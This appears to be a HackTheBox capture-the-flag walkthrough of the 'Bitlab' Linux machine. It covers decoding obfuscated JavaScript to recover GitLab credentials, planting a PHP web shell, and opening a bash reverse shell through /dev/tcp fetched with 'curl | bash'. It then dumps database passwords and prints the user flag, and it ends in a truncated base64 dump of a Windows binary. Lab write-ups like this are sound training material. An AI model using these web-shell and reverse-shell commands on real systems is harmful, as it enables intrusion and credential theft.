Bitlab

This is a medium difficulty Linux machine from HackTheBox created by Frey and thek. In this scenario, my IP is 10.10.14.103 and the target’s IP is 10.129.11.47

Gathering Information

This step is always the same, you must ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.

Local Terminal

ping -c 1 10.129.11.47

Pinging 10.129.11.47 with 32 bytes of data:
Reply from 10.129.11.47: bytes=32 time=227ms TTL=63
Reply from 10.129.11.47: bytes=32 time=190ms TTL=63
Reply from 10.129.11.47: bytes=32 time=209ms TTL=63
Reply from 10.129.11.47: bytes=32 time=199ms TTL=63

Ping statistics for 10.129.11.47:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 190ms, Maximum = 227ms, Average = 206ms

The target respond and by the TTL we can asume that is a Linux machine (Around 63).

Local Terminal

nmap -p- --open -T5 -v -n 10.129.11.47 -oN Ports

Nmap scan report for 10.129.11.47
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Local Terminal

nmap -sCV -p 22,80 10.129.11.47 -oN WebScan

Nmap scan report for 10.129.11.47
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.129.11.47/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Looks like http-robot.txt is open, if there is nothing relevant at the website, we can check some urls by /http-robot.txt.

Local Terminal

whatweb http://10.129.11.47

http://10.129.11.47 [302 Found] Country[RESERVED][ZZ], HTTPServer[nginx], IP[10.129.11.47], RedirectLocation[http://10.129.11.47/users/sign_in], UncommonHeaders[x-content-type-options,x-request-id,x-accel-buffering], X-Frame-Options[DENY], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx
http://10.129.11.47/users/sign_in [200 OK] Cookies[_gitlab_session], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], HttpOnly[_gitlab_session], IP[10.129.11.47], Open-Graph-Protocol, PasswordField[user[password]], Script, Title[Sign in · GitLab], UncommonHeaders[x-content-type-options,x-request-id,x-accel-buffering], X-Frame-Options[DENY], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx

Browser: http://10.129.11.47/

To explore the website, try to login with simple credentials, like admin@admin, or admin@admin1234, etc (Nothing Happens). And then try to recover your password.

Now we return to our finding.

Browser: http://10.129.11.47/robots.txt

Looks like we need to be logged in to get more information from these paths. But after exploring many of them, /help have interesting information.

Browser: http://10.129.11.47/help

As you can see, in view:source at bookmarks.html, there is a Java Script command written in hexadecimal, copy it and use echo to translate.

Local Terminal

printf "var _0x4b18=[&quot;\x76\x61\x6C\x75\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6C\x61\x76\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64&quot;,&quot;\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78&quot;];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];"

The output it is still dirty, we need to replace every &quot by using | sed "s/&quot/'/g" at the end of the previous command.

Local Terminal

printf "var _0x4b18=[&quot;\x76\x61\x6C\x75\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6C\x61\x76\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64&quot;,&quot;\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78&quot;];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];" | sed "s/&quot/'/g"

var _0x4b18=[';value';,';user_login';,';getElementById';,';clave';,';user_password';,';11des0081x';];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];

And here, we can find some important information, like {user_login : clave} and {user_password : 11des0081x}, let's try at user login.

Browser: http://10.129.11.47/users/sign_in
- Login with clave@11des0081x

We can save this information for the future, a good practice is to copy this file and save it in your local device. After doing this, return to Projects > Your Projects > Administrator/Profile.

Here, we have to find where is project is launched, is a profile page, so it must be at http://10.129.11.47/profile/, and if you go to http://10.129.11.47/profile/developer.jpg, you can see that is directly connected, for us this is an advantage, because we are connected as developer "clave" and we can upload or create files here.

Create a new file called reverseShell.php and add the below code, after that, commit and merge the new file.

reverseShell.php

<?php
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

Browser: http://10.129.11.47/profile/reverseShell.php

Browser: http://10.129.11.47/profile/reverseShell.php?cmd=whoami

All right, now that we can execute commands as the target, we are going to follow steps to gain access to the Bash command prompt.

First, create a file called index.html.

Local Terminal

vi index.html

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.103/443 0>&1

Then open two local terminals, one to open an http server and the other one listening using the port 443

Local Terminal I

python3 -m http.server 80

If you want to validate if you can use curl from the target, try at the browser "http://10.129.11.47/profile/reverseShell.php?cmd=which curl"

Local Terminal

nc -nlvp 443

Browser: http://10.129.11.47/profile/reverseShell.php?cmd=curl 10.10.14.103 | bash

Now we are logged at the target machine as www-data.

Target Terminal [www-data]

Connection received on 10.129.11.47 60386
bash: cannot set terminal process group (1415): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bitlab:/var/www/html/profile$ whoami
whoami
www-data

Now that we are in, do an TTY Treatment.

Here, we need to be the user "clave" to see the content of the first flag. Previously, we found a postgresql file in the machine. First you must test with which psql if the system has the application, if not, you can simulate something similar with php, and it's already tested that the target have PHP.

Target Terminal [www-data]

which psql # Nothing happens
php --interactive

If we follow the process by using the example from PHP: PDO, we can login to PSQL.

php example

<?php
/* Connect to a MySQL database using driver invocation */
$dsn = 'mysql:dbname=testdb;host=127.0.0.1';
$user = 'dbuser';
$password = 'dbpass';

$dbh = new PDO($dsn, $user, $password);

?>

PHP: PDO::__construct - Manualofficial_php

php --interactive

$connection = new PDO('pgsql:dbname=profiles;host=localhost', 'profiles', 'profiles');
$connect = $connection->query("select * from profiles");
$result = $connect->fetchAll();
print_r($result);

Array
(
    [0] => Array
        (
            [id] => 1
            [0] => 1
            [username] => clave
            [1] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
            [2] => c3NoLXN0cjBuZy1wQHNz==
        )

)

And we found a password, open a new terminal and translate the password with: echo "c3NoLXN0cjBuZy1wQHNz" | base64 -d; echo. The output is {ssh-str0ng-p@ss}, with this in hand, open a new terminal, translate, and then login thorough ssh.

Local Terminal

echo "c3NoLXN0cjBuZy1wQHNz" | base64 -d; echo
ssh-str0ng-p@ss

ssh clave@10.129.11.47 # ssh-str0ng-p@ss
# It fails? Maybe is now necessary to decrypt the password...

ssh clave@10.129.11.47 # c3NoLXN0cjBuZy1wQHNz==
# It works

Target Terminal [clave]

clave@bitlab:~$ whoami
clave

clave@bitlab:~$ cat /home/clave/user.txt
3508d1a1a8f6660db185698b142a0ac0

Privileges Escalation

So first we want to gather information from the current account.

Target Terminal [clave]

clave@bitlab:~$ id
uid=1000(clave) gid=1000(clave) groups=1000(clave)

clave@bitlab:~$ sudo -l  # Both password fails...
Sorry, try again.
[sudo] password for clave:
Sorry, try again.
[sudo] password for clave:
sudo: 2 incorrect password attempts

clave@bitlab:~$ uname -a
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

clave@bitlab:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.2 LTS
Release:        18.04
Codename:       bionic

clave@bitlab:~$ ls -l
total 20
-r-------- 1 clave clave 13824 Jul 30  2019 RemoteConnection.exe
-r-------- 1 clave clave    33 May 19 13:53 user.txt
clave@bitlab:~$

And the only interesting thing here is only the file "RemoteConnection.exe", we will download that file and then try to figure out what's going on.

From the target, encrypt the whole file in base64, copy the content and create a file at your local terminal, with the same name.

Target Terminal [clave]

python3 -m http.server 8080

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